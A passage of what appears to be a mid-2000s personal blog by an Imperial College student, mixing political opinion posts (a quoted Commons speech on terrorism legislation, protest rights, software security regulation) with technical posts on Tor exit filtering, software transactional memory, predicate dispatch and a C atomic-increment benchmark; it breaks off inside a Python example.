    There may be some argument that people need broadband in the same way that public libraries are a good idea. But even I wouldn't suggest that broadband is that important. Indeed, broadband usage in the US has fallen (in terms of world rankings) quite sharply in recent years, suggesting that American people agree. If there was demand for broadband then I suspect companies would be offering it in more areas of Philadelphia already.

    New Dr. Who

    I'm now utterly convinced that the leak of the first episode of the new series of Dr. Who was not a cunning viral marketing ploy. It's rubbish. It plays like an episode of Neighbours with a phone box in it. The special effects of the old series were charmingly primitive. I'm not sure if the effects in the new series were trying to emulate that or if they were just dire. I couldn't even watch it all the way through.

    (NB: This server heeps wi...

    (NB: This server heeps will be down for upgrades from 11am GMT tomorrow until it's finished.)

    I don't have a whole lot to write about at the moment, as the timestamps on these pages will attest.

    It's my third, and final, ride round the merry-go-round at Imperial as the second term draws to a close and the Easter revision period looms large. At the end of this period lie the exams - painfully spread out - and the guilt of knowing that I should probably be doing more revision tempered with the knowledge that my mark was probably set in the first couple of weeks of the course; when I figured out if I liked it. Never has anything managed to motivate me to do something which I don't enjoy.

    And then (after a long gap in which I've nothing to do and no money to do it with) I'm probably going to be leaving it all behind. Possibly going to Zürich, slim chance of Mountain View.

    Brian Sedgemore MP on the Prevention of Terrorism Bill

    (Hansard source, theyworkforyou link)

    As this will almost certainly be my last speech in Parliament, I shall try hard not to upset anyone. However, our debate here tonight is a grim reminder of how the Prime Minister and the Home Secretary are betraying some of Labour's most cherished beliefs. Not content with tossing aside the ideas and ideals that inspire and inform ideology, they seem to be giving up on values too. Liberty, without which democracy has no meaning, and the rule of law, without which state power cannot be contained, look to Parliament for their protection, but this Parliament, sad to say, is failing the nation badly. It is not just the Government but Back-Bench Members who are to blame. It seems that in situations such as this, politics become incompatible with conscience, principle, decency and self-respect. Regrettably, in such situations, the desire for power and position predominates.

    As we move towards a system of justice that found favour with the South African Government at the time of apartheid and which parallels Burmese justice today, if hon. Members will pardon the oxymoron, I am reminded that our fathers fought and died for liberty - my own father literally - believing that these things should not happen here, and we would never allow them to happen here. But now we know better. The unthinkable, the unimaginable, is happening here.

    In their defence, the Prime Minister and the Home Secretary say that they are behaving tyrannically and trying to make nonsense of the House of Lords' decision in A and Others as appellants v. the Home Secretary as respondent because they are frightened, and that the rest of us would be frightened too if only we knew what they will not tell us. They preach the politics of fear and ask us to support political incarceration on demand and punishment without trial.

    Sad to say, I do not trust the judgment of either our thespian Prime Minister or our Home Secretary, especially given the latter's performance at the Dispatch Box yesterday. It did not take Home Office civil servants or the secret police long to put poison in his water, did it? Paper No. 1, entitled "International Terrorism: the Threat", which the Home Secretary produced yesterday and I have read, is a putrid document if it is intended to justify the measure. Indeed, the Home Secretary dripped out bits of it and it sounded no better as he spoke than it read. Why does he insult the House? Why cannot he produce a better argument than that?

    How on earth did a Labour Government get to the point of creating what was described in the House of Lords hearing as a "gulag" at Belmarsh? I remind my hon. Friends that a gulag is a black hole into which people are forcibly directed without hope of ever getting out. Despite savage criticisms by nine Law Lords in 250 paragraphs, all of which I have read and understood, about the creation of the gulag, I have heard not one word of apology from the Prime Minister or the Home Secretary. Worse, I have heard no word of apology from those Back Benchers who voted to establish the gulag.

    Have we all, individually and collectively, no shame? I suppose that once one has shown contempt for liberty by voting against it in the Lobby, it becomes easier to do it a second time and after that, a third time. Thus even Members of Parliament who claim to believe in human rights vote to destroy them.

    Many Members have gone nap on the matter. They voted: first, to abolish trial by jury in less serious cases; secondly, to abolish trial by jury in more serious cases; thirdly, to approve an unlawful war; fourthly, to create a gulag at Belmarsh; and fifthly, to lock up innocent people in their homes. It is truly terrifying to imagine what those Members of Parliament will vote for next. I can describe all that only as new Labour's descent into hell, which is not a place where I want to be.

    I hope that but doubt whether ethical principles and liberal thought will triumph tonight over the lazy minds and disengaged consciences that make Labour's Whips Office look so ridiculous and our Parliament so unprincipled.

    It is a foul calumny that we do today. Not since the Act of Settlement 1701 has Parliament usurped the powers of the judiciary and allowed the Executive to lock up people without trial in times of peace. May the Government be damned for it.

    Why we shouldn't have security regulation

    Bruce Schneier is calling for regulation of software to punish companies who release programs with security problems. This is stupid (sorry Bruce):

    1. Govt regulation is bad: It creates bureaucracy, its rules are complex, arbitrary and inflexible and it costs ... lots. Unless there is a clear benefit to regulation, which gains us more than it costs, then we shouldn't do it. This means that the burden of proof is on the other side.
    2. Who knows what the hell those crazy fools will come up with?: Let's face it. If we're talking about laws to regulate the tech industry then the people voting on them are mostly the same lot which gave us the DMCA (if you're in the US), the EUCD and (very nearly) software patents (if you're EU). These people are not competent to regulate software.
    3. Who are they to decide on the balance of security?: Security is a trade off. People still run phpBB, despite its security record, because they think it's functionally superior and that that makes up for the security. That seems to work well for sites like forums.gentoo.org, but other people (myself included) treat running phpBB as the security equivalent of bending over in the prison showers.
    4. What about open-source (etc) software?: Leading on from the second point ... who's to say that you won't be able to release open-source software without liability insurance? If software makers are going to be fined for security problems how is this going to be avoided? Do you trust them to draw that line properly?
    5. What's a security problem?: While they're at it you can be sure that there will be a push from some quarters to get tools like nmap and nessus banned (or made impossibly expensive for their authors). I'm sure that the MPAA and RIAA would define the end-to-end nature of the Internet as a security problem, would you?

    Yes, this is fear-mongering. There's a possibility that a given law will be very sensible and reasonable (a thousand monkeys etc). But I'm saying that we shouldn't even start down that road because it will probably end up somewhere very bad and we won't be able to steer it once it starts.

    Directions in Future Languages - Lock-Free malloc

    Normally I'll just bookmark papers, but I've found one that deserves better treatment: Scalable Lock-free Dynamic Memory Allocation. It was presented at PLDI04 and is everything a paper should be: practical, clear and with great results.

    The author presents a malloc implementation which is lock-free (so you can call it from signal handlers, or kill threads and not cause deadlock etc) and it's faster (on SMP boxes) than the other mainstream concurrent allocators (Hoard and PTMalloc specifically).

    For anyone at Imperial, you should come to a talk by Tim Harris on this subject on March 9th (details to be announced).

    Entertain

    And everyone at (or near) Imperial should come to the charity ball in the Great Hall on the 26th of this month. Tickets are £10 and every penny goes to charity.

    Queens tower with projection

    Why Application Level Filtering in Tor is Bad

    Background for those who need it: Tor is an onion routing network for TCP streams that allows users to be fairly anonymous while using HTTP/IRC etc. The TCP connections are bounced round the Tor nodes and come out somewhere unrelated to the real source of them.

    Of course, over such networks abuse happens. At the moment the most concerning is the spamming of Usenet via Google Groups. Not all Tor nodes allow themselves to be the final (exit) node in the chain as that node is where the connection appears to be coming from (at the IP level) to whoever is the target of the connection. Those that do only allow certain destination ports - 80 is a very common one. Thus people can use Tor to access Google Groups and post spam to Usenet.

    (It's suspected, for a number of reasons, that people are doing this in order to trigger complaints to the ISP of the exit nodes and thus it's an attack on the Tor network as a whole. Some people truly believe that anonymity is evil.)

    Tor exit nodes can refuse to connect to Google Groups and this is reported in the Tor network wide directory of nodes. Thus clients can check which nodes will support a connection to the destination that they require and choose those nodes as exit nodes. However, a running game of blocking websites used for abuse is probably an unwinnable game. Also, why shouldn't people be able to read Google Groups over Tor? It's only posting that is concerning.

    Thus some people (e.g. myself) have suggested that the exit nodes should be able to parse outgoing connections (HTTP being a very good example) and reject POST requests and the like. Here's why this is a bad idea.

    This policy could be described in the directory, as IP based policies currently are, but it couldn't be used because the first Tor node (the client) cannot know if the browser is going to need to POST before creating the connection, and the exit node is chosen at that point. Thus the exit nodes are chosen randomly and some will have POST blocked.

    Tor users then experience random failure of posting. Sometimes it will work, sometimes it won't. So the whole network will be dragged down to the level of the most restrictive exit node - because anything else will randomly fail.
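    A toy model makes the point. The exit nodes, their policies and both functions here are made up for illustration (real exit policies also cover addresses, not just ports); the only thing that matters is that the client picks an exit knowing just the destination port.

```python
from fractions import Fraction

# Hypothetical exits: (name, allowed destination ports, blocks POST?)
EXITS = [
    ("exit-a", {80, 443}, False),
    ("exit-b", {80}, True),
    ("exit-c", {22, 80}, False),
    ("exit-d", {6667}, False),
]


def eligible_exits(port, exits=EXITS):
    # All the client can check when building the circuit is the port.
    return [e for e in exits if port in e[1]]


def post_failure_rate(port, exits=EXITS):
    """Chance that a POST fails when the exit is picked uniformly at random."""
    candidates = eligible_exits(port, exits)
    if not candidates:
        return None
    blocked = sum(1 for e in candidates if e[2])
    return Fraction(blocked, len(candidates))
```

    With these made-up nodes, one in three web circuits lands on an exit that will refuse the POST, and the user has no way to tell in advance which one they've got.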

    Right To Protest

    Our dear government has announced that there will be a crackdown on protesters in the new crime bill which is going through the motions at the moment.

    This is clearly (and explicitly, in all but the wording of the bill) aimed at `animal rights' protesters who have, in recent times, stepped up their campaigning to include grave robbing, hate mail, vandalism, etc. The arguments are predictable and the animal rights `protesters' are claiming that this is an attack on their right to protest.

    I believe that a right to protest should exist. Protesting gives a voice to those that cannot be heard another way. This may be because of financial limits, or because the media refuses to carry their story. As a firm believer in freedom of speech, I think that protesting is an important form of communication.

    However, the right to protest is fairly limited. It's a communication mechanism, not a way to impose one's views on the world. What some animal rights `protesters' are doing has gone far beyond communication, into enforcement.

    I'm slightly off-balance finding myself, as I do, in agreement with the government on this one. They are enforcing their monopoly on violence, which is right. We install a monopoly on violence in the government because we can (hopefully) control it via the democratic process. That democratic process then sets the limits on what the people can do. If it gets it right, the limits should be minimal.

    Animal rights protesters are seeking to impose their own limits on what is already a tightly regulated sector. The government is right to slap them down.

    Directions in Future Languages - Software Transactional Memory

    STM is a method of handling concurrency in multithreaded systems. The light at the end of this tunnel is that we wish to be able to write the following:

    def add-child(x):
      global children-by-name, children-by-id
      atomic:
        children-by-name[x.name] = x
        children-by-id[x.id] = x

    At no point would any other thread see the child in one map, but not the other. Traditionally this would be done with locks. The maps themselves would have locks inside them, of course, and would thus be `thread safe', but we would need to implement our own locking in order to achieve atomicity between them. An STM says that, when you enter an atomic block, nothing happens until you exit it and then it all happens at once. If another thread altered children-by-name while you were processing the block above, the atomic block would be aborted and attempted again.
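    For comparison, the traditional lock-based version looks something like this in Python. It's a sketch: Child, lookup and the lock's name are illustrative and not part of the example above.

```python
import threading
from collections import namedtuple

Child = namedtuple("Child", ["name", "id"])

children_by_name = {}
children_by_id = {}
_children_lock = threading.Lock()  # one lock guarding both maps together


def add_child(child):
    with _children_lock:
        children_by_name[child.name] = child
        children_by_id[child.id] = child


def lookup(name=None, id=None):
    # Readers have to take the same lock, otherwise they could see the
    # child in one map but not yet in the other.
    with _children_lock:
        if name is not None:
            return children_by_name.get(name)
        return children_by_id.get(id)
```

    The burden is that every piece of code touching either map has to know about the lock and remember to take it; the atomic block moves that bookkeeping into the runtime.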

    Lock-free techniques:

    The design I'm outlining is from the lock-free group at Cambridge and a good explanation can be found in Keir Fraser's PhD dissertation. So why am I reiterating it here? Partly because I'm probably going to need to write something like this for a report of my own at some point, but also because digging into a PhD can be tough work and these ideas deserve to be better known.

    So here's an STM linked list:

    The first thing to notice is that nothing holds a direct pointer to anything - they are all via STM object headers. The object header holds the true pointer to the data.

    When starting a transaction, a transaction context must be created. This holds the status of the transaction (undecided at the moment) and two lists; a read list and a write list. In this STM design, objects must be `opened' - either for reading or for writing. When you open an object you get a pointer to the true data and that object is recorded in the context.

    Thus you open the objects you need (say, opening for read each list element in turn until you find one to delete, thus opening the previous one for write). When an object is opened for write, a copy is made and a pointer to that is returned. Thus you don't edit `live' objects.

    So assume that you're removing the last element from this list. Thus you've read the first element and altered the second element (to put a null pointer in its next field). Your memory now looks like this:

    Since you are finished altering the list you commit the transaction. At this point we need to introduce a hardware level primitive that we'll be using. In the literature it's called CAS (Compare and Swap) and, on Intel systems, it's called Compare and Exchange (cmpxchg). It takes three arguments: (old value, new value, memory location) and replaces the contents of memory location with new value if, and only if, its current value is old value, returning the contents that memory location held before the instruction - and it does this atomically.
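    Python has no way to issue the hardware instruction, so this sketch emulates it: a lock stands in for the atomicity that cmpxchg gives you for free. Cell, cas and atomic_increment are illustrative names, and this cas returns whatever value it found in the cell before any swap.

```python
import threading


class Cell:
    """A memory location. The lock stands in for hardware atomicity."""

    def __init__(self, value):
        self.value = value
        self._lock = threading.Lock()


def cas(cell, old, new):
    """Store new in cell only if it currently holds old; return what was seen."""
    with cell._lock:
        seen = cell.value
        if seen == old:
            cell.value = new
        return seen


def atomic_increment(cell):
    # The classic CAS loop: read, compute, try to swap, retry if beaten to it.
    while True:
        old = cell.value
        if cas(cell, old, old + 1) == old:
            return old + 1
```

    The retry loop in atomic_increment is the shape of every CAS-based algorithm: if someone else got there first, nothing is corrupted, you simply go round again.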

    So the CAS operation allows us to update a value in memory, assuming that someone hasn't already beaten us to it. A transaction commit uses this operation to change the pointer in the object headers of objects in the write list, to point to the transaction context instead. This is called `acquiring' the header and it is done in order of increasing memory address.

    So, assuming that no other transaction is committing and has beaten us to it, our memory now looks like:

    But what if another thread is committing a conflicting transaction? In that case we'll find a pointer to its transaction context when we do a CAS and we recursively help. Since we have a pointer to its context, we have all the information we need in order to perform its commit ourselves, so we do so. This is to ensure that some progress is always being made by the program as a whole. Unfortunately, it also means that our transaction is void so we abort and try it again.

    Assuming that we have acquired all the object headers that we are writing, we have to check that none of the objects that we read have been updated in the meantime. If everything looks good we update the pointers in the object headers to point to our shadow blocks and release them - the transaction is complete:

    (Note, this is a simplification - see the paper for the full details. Gray objects are now garbage.)
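
    The open/commit cycle described above can be sketched in Python. Everything here is illustrative rather than the paper's design: Header, Transaction and their methods are invented names, a lock stands in for CAS, id() stands in for the memory address, and the recursive helping step is left out (a conflicting commit simply aborts). It also assumes that no other commit is in flight while objects are being opened.

```python
import threading

_cas_lock = threading.Lock()  # assumption: stands in for the atomic CAS instruction


class Header:
    """Object header: the only thing that other objects point to."""

    def __init__(self, data):
        self.ptr = data  # the live data, or the Transaction that has acquired us

    def cas(self, old, new):
        with _cas_lock:
            prior = self.ptr
            if prior is old:
                self.ptr = new
            return prior


class Transaction:
    def __init__(self):
        self.status = "undecided"
        self.reads = []   # (header, data seen)
        self.writes = []  # (header, data seen, shadow copy)

    def open_read(self, header):
        data = header.ptr
        self.reads.append((header, data))
        return data

    def open_write(self, header):
        data = header.ptr
        shadow = dict(data)  # edit a copy, never the live object
        self.writes.append((header, data, shadow))
        return shadow

    def commit(self):
        acquired = []
        ok = True
        # Acquire the headers in one global order to avoid deadlock.
        for header, old, shadow in sorted(self.writes, key=lambda w: id(w[0])):
            if header.cas(old, self) is old:
                acquired.append((header, old, shadow))
            else:
                ok = False  # beaten to it; the full design would help the winner
                break
        if ok:
            # Check that nothing we read has changed in the meantime.
            owned = {id(h): old for h, old, _ in acquired}
            for header, seen in self.reads:
                if owned.get(id(header), header.ptr) is not seen:
                    ok = False
                    break
        self.status = "committed" if ok else "aborted"
        for header, old, shadow in acquired:
            header.ptr = shadow if ok else old  # release the header
        return ok


# A three element list; remove the last element.
third = Header({"value": 3, "next": None})
second = Header({"value": 2, "next": third})
first = Header({"value": 1, "next": second})

tx = Transaction()
node = tx.open_read(first)             # walk the list read-only
shadow = tx.open_write(node["next"])   # shadow copy of the second element
shadow["next"] = None                  # unlink the last element
committed = tx.commit()
print(committed, second.ptr["next"])
```

    Until commit succeeds, other threads only ever see the old second element; the shadow copy becomes visible in one step when the header is released.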

    There are several other tricks which can be added to the above. The same Cambridge group has some ideas in one of their recent papers about how IO can be included in a transaction. IO is, of course, a side-effectful operation, so it clashes with any need to `roll-back' a transaction. The Cambridge group have implemented IO in Java which can rebuffer and be included in a transaction.

    More cool ideas are presented in this paper (which is talking about a Haskell based STM). There the author presents a primitive called retry which aborts the current transaction and only retries it when an object in the read-list is updated. Thus a queue can be implemented like this:

    class Q:
      def get(self):
        if self.length == 0:
          retry
        return self.q.pop()

    Thus no more missed condition variables resulting in a stuck thread.
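
    For comparison, here is roughly what the same queue costs in today's Python, where the waiting and the waking have to be written by hand with a condition variable. This is a sketch with illustrative names, not anything from the paper; forgetting the notify call in put is exactly the kind of missed wakeup that retry would rule out.

```python
import threading
from collections import deque


class Q:
    def __init__(self):
        self.q = deque()
        self.cond = threading.Condition()

    def put(self, item):
        with self.cond:
            self.q.append(item)
            self.cond.notify()  # forget this and get() can sleep forever

    def get(self):
        with self.cond:
            while len(self.q) == 0:  # hand-written stand-in for `retry`
                self.cond.wait()
            return self.q.popleft()


q = Q()
results = []
consumer = threading.Thread(target=lambda: results.append(q.get()))
consumer.start()
q.put("hello")
consumer.join()
print(results)
```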

    Including SVG figures in TeX documents

    Doing this is way tougher than it should be. I gather that, although SVG may be included in PDF documents (for some versions of PDF), it cannot be included inline, but only by giving the SVG a whole page. I've no idea why though.

    Note that I won't accept any path which introduces bitmaps. Thus exporting SVG as a high DPI bitmap and including that will not do. That's easy. My requirement is that it look pretty in Acroread 7. (Yes, I have Acroread 7 for Linux but it won't be public for a while yet.)

    Why do I want to include SVG? Because good editors for SVG exist. My favourite is Inkscape and, although xfig will always have a place in my heart, it doesn't really cut it anymore I'm afraid.

    So, you'll need:

    • An SVG file - create this yourself or Google for one if you like
    • pdftex - included with TeTeX, standard on most Linux distributions
    • Apache FOP - an SVG to PDF converter (and thus you need a JRE)

    FOP was the tough thing to find. Google was little help here. You may also have success with Scribus: it has good PDF output, but its SVG import was too poor for me. Also, you may wish to try Adobe SVG Viewer on Windows or Mac OS X with a PDF printer driver.

    To use FOP you'll need to download this wrapper XML file and edit it to set the name of your SVG file. Then export JAVA_HOME and run FOP:

    ./fop.sh svgpdf.fo -pdf output.pdf

    Done? Now edit your TeX file and include the pdftex graphics package:

    \usepackage[pdftex]{graphicx}

    And include the PDF file:

    \begin{figure}[h]
    \scalebox{0.82}[0.82]{\includegraphics[viewport=0 740 200 840]{filter-dia.pdf}}
    \caption{The capability filter pattern}
    \end{figure}

    The arguments to scalebox are the X and Y scale factors. The viewport argument is a clipping box for the source PDF file: the lower-left and upper-right corners in pts from the bottom-left of the page. Those values take a few trials to get right, but Inkscape will tell you the general values.

    Directions in Future Languages - Exceptions

    (Andy: sorry, your Jabber client isn't going to like this one either :))

    Exceptions generally work well (so long as people don't misuse them for general control flow) but I'm still looking for a language with a couple of features, which I think are missing.

    Firstly, I want to be able to test which object raised the exception. Consider:

    try:
      somefunc(mapping[key])
    except KeyError:
      return 'key unknown!'

    Unfortunately, the KeyError may have come from the lookup in mapping, or it may have come from deep within somefunc - I've no way of telling. In Python I can test the value which caused the error, but that's a bodge.
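
    To show why that is a bodge, here is a small sketch of it. The lookup and broken functions are made up for the illustration; the only real behaviour relied on is that a failed dict lookup puts the missing key in the exception's args.

```python
def lookup(mapping, key, func):
    try:
        return func(mapping[key])
    except KeyError as e:
        # A failed dict lookup carries the missing key in e.args[0].
        if e.args and e.args[0] == key:
            return 'key unknown!'
        raise  # some other KeyError from inside func


def broken(value):
    return {}[value]  # raises KeyError(value) from deep inside


print(lookup({'a': 1}, 'b', str))        # the case we wanted to catch
print(lookup({'a': 'a'}, 'a', broken))   # misreported: the key was present
```

    The second call reports an unknown key even though the lookup in mapping succeeded, because the inner KeyError happens to carry the same value.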

    There are several workarounds:

    if key not in mapping:
      return 'key unknown!'
    somefunc(mapping[key])

    Which is probably what I would do - but it requires an additional lookup. Or:

    try:
      value = mapping[key]
    except KeyError:
      return 'key unknown!'
    somefunc(value)

    Which is a little ugly. What I really want is a way to test which object caused the KeyError in the first place:

    try:
      somefunc(mapping[key])
    except KeyError from mapping:
      return 'key unknown!'

    Also, I would like to second a call from Bram for the ability to assert that a given exception would be caught, somewhere in the call chain, by something other than a default handler. Currently there's no way to do this at all in Python (except glitch testing - even then it's not certain) and I've also not heard of it any place else.

    Directions in Future Languages - Predicate Dispatch

    I'm certainly not the first person to talk about predicate dispatch. Like almost everything else in the world of computing - LISP has already done it. But that doesn't mean that anyone actually uses it. (If you want papers see [it rocks] and [it's efficient].)

    You probably know predicate dispatch from such languages as Haskell and Erlang:

    def fact(0):
      return 1
    def fact(N):
      return N*fact(N - 1)

    That's an example of pattern matching, but we can do more:

    def is_even?(N) where N % 2 == 0:
      return 'yes'
    def is_even?(N):
      return 'no'

    We're allowed to test whatever we wish as a predicate. Many people think that the predicates should be side-effect-free, but I'm not too bothered about that. If some coder has good reason for a side-effectful predicate then go right ahead.

    Note that, in the last example, the most specific function was called. This is determined by the dispatcher. The dispatcher collects and sorts a list of candidate functions and determines which are to be called. Even if I say most-specific-first I don't mean to say that the following will always work:

    def foo(N) where N % 2 == 0:
      return True
    def foo(N) where N % 4 == 0:
      return False

    Sure, the second function is more specific (anything divisible by four is also divisible by two), but don't expect your language to work that out. In the above case, both functions would be deemed equally specific so it would probably be a case of most-recently-defined first.
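
    A toy dispatcher makes the ordering question concrete. This is a minimal sketch in plain Python, not how any real system does it: the when decorator and its registry are invented names, and there is no specificity ranking at all, only most-recently-defined first. That means the catch-all version has to be defined before the guarded one.

```python
_registry = {}


def when(predicate=lambda *args: True):
    """Register a function under its name, guarded by `predicate`."""
    def decorator(func):
        candidates = _registry.setdefault(func.__name__, [])
        candidates.insert(0, (predicate, func))  # newest is tried first

        def dispatch(*args):
            for pred, candidate in candidates:
                if pred(*args):
                    return candidate(*args)
            raise TypeError("no applicable function for %r" % (args,))
        return dispatch
    return decorator


@when()
def is_even(n):
    return 'no'


@when(lambda n: n % 2 == 0)
def is_even(n):
    return 'yes'


@when(lambda n: n % 2 == 0)
def foo(n):
    return True


@when(lambda n: n % 4 == 0)
def foo(n):
    return False


print(is_even(4), is_even(7))
print(foo(8), foo(6))
```

    With this ordering foo(8) reaches the divisible-by-four version only because it was defined last; swap the two definitions and the divisible-by-two version would shadow it.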

    This brings us to a couple of other common tricks in these systems: call-next and :before, :after functions etc.

    A call-next allows a more specific function to do stuff and then call the next most specific one etc:

    def authenticate-user(Username) where Username == 'root':
      if global-disallow-root:
        return False
      return call-next(Username)

    In dynamic languages that function could be injected at any point and thus 'override' a generic authenticate-user function in a library.

    :before, :after and :around are from LISP (note the colon) and allow an equally specific function to bump itself up the priority stack (:before), pre-process the return value before the caller sees it (:after) or both (:around).
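
    The call-next idea can be approximated in Python by handing each candidate a callable that resumes the search below it. This is a sketch under assumptions: the define decorator, the candidate list and the stand-in user check are all invented for the example, and candidates are simply tried newest first.

```python
import functools

global_disallow_root = True
_candidates = []  # (predicate, function) pairs, most recently defined first


def define(predicate):
    def decorator(func):
        _candidates.insert(0, (predicate, func))
        return func
    return decorator


def authenticate_user(username, _start=0):
    """Call the first applicable candidate at or after position _start."""
    for i in range(_start, len(_candidates)):
        pred, func = _candidates[i]
        if pred(username):
            call_next = functools.partial(authenticate_user, _start=i + 1)
            return func(username, call_next)
    raise TypeError("no applicable function")


@define(lambda username: True)
def generic(username, call_next):
    return username in ('root', 'agl')  # stand-in for a real credential check


@define(lambda username: username == 'root')
def root_guard(username, call_next):
    if global_disallow_root:
        return False
    return call_next(username)


print(authenticate_user('root'), authenticate_user('agl'))
```

    The root_guard function could live in a completely different module from generic, which is the sense in which it is injected.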

    Also, if one can define any dispatcher one likes (on a per-function-name basis) then they can do odd things. Like calling every applicable function and summing their return values. (Probably best if the combining function is commutative like addition, I think). I can't think, right now, of an example where it would be useful, but I'm sure someone will come across a suitable problem at some point in the history of the universe.
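
    Mechanically, such a summing dispatcher is tiny. The sketch below is a contrived illustration only: the contributes decorator, the shipping_cost name and the order fields are all made up, and it makes no claim that this is a good use of the idea.

```python
_handlers = []


def contributes(predicate):
    def decorator(func):
        _handlers.append((predicate, func))
        return func
    return decorator


def shipping_cost(order):
    """Dispatcher that calls every applicable function and sums the results."""
    return sum(func(order) for pred, func in _handlers if pred(order))


@contributes(lambda order: True)
def base(order):
    return 5


@contributes(lambda order: order['weight'] > 10)
def heavy(order):
    return 7


@contributes(lambda order: order['express'])
def express(order):
    return 12


print(shipping_cost({'weight': 12, 'express': False}))
```

    Because addition is commutative, the order in which the applicable functions are called makes no difference to the result.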

    With predicate dispatch one can also build up common features of programming languages like, say, object orientation:

    Let class be a type where SomeClass == SomeDerivedClass is true, but SomeDerivedClass == SomeDerivedClass is a more specific match. Now I can define objects:

    def __init__(Self, X, Y) where Self == Rectangle:
      Self.X = X
      Self.Y = Y
    
    def type(Self) where Self == Rectangle:
      return 'Rectangle'
    
    Circle(Rectangle)  # make Circle == Rectangle and
                       #      Circle <  Rectangle true
    
    def __init__(Self, X) where Self == Circle:
      Self.X = X
      Self.Y = X  # a circle is as tall as it is wide
    
    def type(Self) where Self == Circle:
      return 'Circle'

    Now one can override functions of a class 'in-place'. Just declare a more specific function (or use something like :before) and all calls to existing instances of that object are overridden:

    def :before type(Self) where Self == Circle:
      return 'Ha, this will screw things up'

    (p.s. I've no idea why I suddenly started Capitalising the first letter of variables in the examples. It's bad - don't do it.)

    (you too can play with this stuff today by using PEAK)

    Atomic Increment

    I've had this link about Java atomic operations in my del.icio.us links for a while now. I'm reading around the subject for a number of far flung ideas which might make it into my final year project. But I hate being too abstract for too long, so I implemented a single atomic counter to check that it works the way I expect etc.

    As ever, the gcc info pages on inline asm are pretty bad and AT&T syntax buggers me every time. Still, I have two (NPTL) threads each incrementing a counter. I can increment them without locking, with an atomic op and with locking.

    Without locking: 0.2 secs, with locking: 14.1 secs, with atomic ops 3.2 seconds. Not bad.

    /* Very quick demo of atomic operations
     * agl */
    #include <pthread.h>
    #include <stdio.h>
    
    volatile int count = 0;
    
    /* Atomically increment x with a compare-and-exchange retry loop.
     * One asm statement, so the compiler cannot schedule code between
     * the load and the cmpxchg; "1:" is a local label, safe to reuse. */
    #define ATOMIC_INC(x) \
    	asm volatile("1:\n\t" \
    	             "mov %0, %%eax\n\t" \
    	             "mov %%eax, %%edx\n\t" \
    	             "inc %%edx\n\t" \
    	             "lock cmpxchg %%edx, %0\n\t" \
    	             "jnz 1b" \
    	             : "+m" (x) : : "eax", "edx", "cc", "memory")
    
    /* A thread function to increment count atomically */ 
    void *
    incr(void *arg) {
    	int a;
    	for (a = 0; a < 10000000; ++a) {
    		ATOMIC_INC(count);
    	}
    
    	return NULL;
    }
    
    pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
    
    /* A thread function which uses locking */
    void *
    incr_locked(void *arg) {
    	int a;
    	for (a = 0; a < 10000000; ++a) {
    		pthread_mutex_lock(&mutex);
    		count++;
    		pthread_mutex_unlock(&mutex);
    	}
    
    	return NULL;
    }
    
    int
    main() {
    	pthread_t th1, th2;
    
    	pthread_create(&th1, NULL, incr, NULL);
    	pthread_create(&th2, NULL, incr, NULL);
    	
    	pthread_join(th1, NULL);
    	pthread_join(th2, NULL);
    
    	printf("count is %d\n", count);
    
    	return 0;
    }

    People who read this via ...

    People who read this via RSS probably don't even notice my del.icio.us feed at the top. (The RSS for that is here).

    Recently, I have mostly been reading about concurrency. This isn't new - I've been thinking about it for ages (in fact, some people wish I would shut up about it sometimes). But previously my thinking has been about how to manage complex, stateful servers without lock-hell or inversion-of-control. I've now written a Python module (twistless) which does this very nicely. (Source available upon prodding, but it needs polishing before a public release)

    But that (and my other code, like Neuroses) is based around syncthreading which manages to avoid locks by only really having a single thread. The complexity is vanquished, but it doesn't actually use an SMP machine.

    This was in the hope that `it will always be fast enough tomorrow'. The thinking was that doubling the speed of your library wasn't worth hand-crafted inverted control code because the CPUs would catch up soon enough anyway. But anyone who has been watching cpu speeds will have noticed that this is no longer true - we've hit the ceiling and CPUs are now growing outwards (multiple cores) rather than upwards (ever faster clock speeds).

    Herb Sutter has a good text in DDJ about this.

    Doing `true' concurrency without lock-hell is really tough. I don't know how to do it. (Maybe you're smart enough to write complex, multi-threaded code with fine-grained, deadlock and priority-inversion free locking - but I'm not, and nor are a lot of people.) Erlang does quite well in this area with very real results (working ATM switches etc), but it's based around the idea of message-passing threads, which isn't my cup of tea.

    The most exciting thing I've read about this is Composable memory transactions which uses a begin-commit style for shared memory (with retry and orElse - see the paper). Unfortunately, it's built on Haskell. (A language which calls IO, exceptions and external calls the "awkward squad" was built on the wrong foundations I'm afraid. Having said that - here's a great introduction on how to do them in Haskell).

    Unfortunately, I can't see that the ideas in that paper fit neatly into any current language. (The authors had to hack GHC quite a lot - and even then it only runs syncthreads in a single kernel-thread!) so maybe a new language is in order to play about with them.

    I was failing miserably t...

    I was failing miserably to explain this idea to someone a while back. Partly because I didn't have it in any order in my head but mostly because the other person was getting that look in their eyes which means "Abort! Abort!". So here's a (hopefully) better attempt to explain it so that I'm ready next time.

    (Andre: This is the idea in Permutation City, but I don't actually think that Greg Egan explains it terribly well there - read his short stories. And should Andre have an é at the end?)

    Firstly, if you're a dualist give up now. (And if, when you read `dualist', you're thinking of two people, back to back, with pistols then you probably are :)).

    Ok, if you're still with me I can create a cellular automaton in some Turing Machine with some set of rules and let it progress till I have a conscious life form in it which has deduced the existence of rice pudding and income tax. (Absolutely, this would take some time. But if you accept that it is possible then you accept that I could do it so assume that I have)

    Now my Turing machine is executing this universe and I can halve its speed and it makes no difference to the being in the universe; it doesn't perceive that anything is different. I can start doing lots of other calculations on the side and it still makes no difference so long as we calculate another iteration once in a while. So we can do anything in the middle and our life form is still happy, eating rice pudding.

    Now we start generating sequential CA universes. Ignore the ruleset, just set each cell to a bit from a huge counter, over the whole size of the (I assume finite) universe. In the process we will, at some point, generate the next iteration of our rice pudding monster. Thus we are still generating iterations, just doing other stuff in between, thus our conscious rice pudding monster is unaffected. Right?
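
    On a tiny scale the counting argument can be run directly. The sketch below is an illustration under assumptions: an 8-cell ring and rule 110 are arbitrary choices (the argument doesn't depend on them), and monster is just some starting pattern. The counter loop never consults the rule, yet it passes through the state that the rule would have produced.

```python
def step(state, width):
    """One iteration of an illustrative rule (rule 110) on a ring of cells."""
    cells = [(state >> i) & 1 for i in range(width)]
    nxt = 0
    for i in range(width):
        left = cells[(i + 1) % width]
        mid = cells[i]
        right = cells[(i - 1) % width]
        pattern = (left << 2) | (mid << 1) | right
        nxt |= ((110 >> pattern) & 1) << i
    return nxt


WIDTH = 8
monster = 0b00010110               # some arbitrary current state
successor = step(monster, WIDTH)   # what the ruleset says comes next

# "Ignore the ruleset": just count through every possible universe.
found = False
for counter in range(2 ** WIDTH):
    if counter == successor:
        found = True
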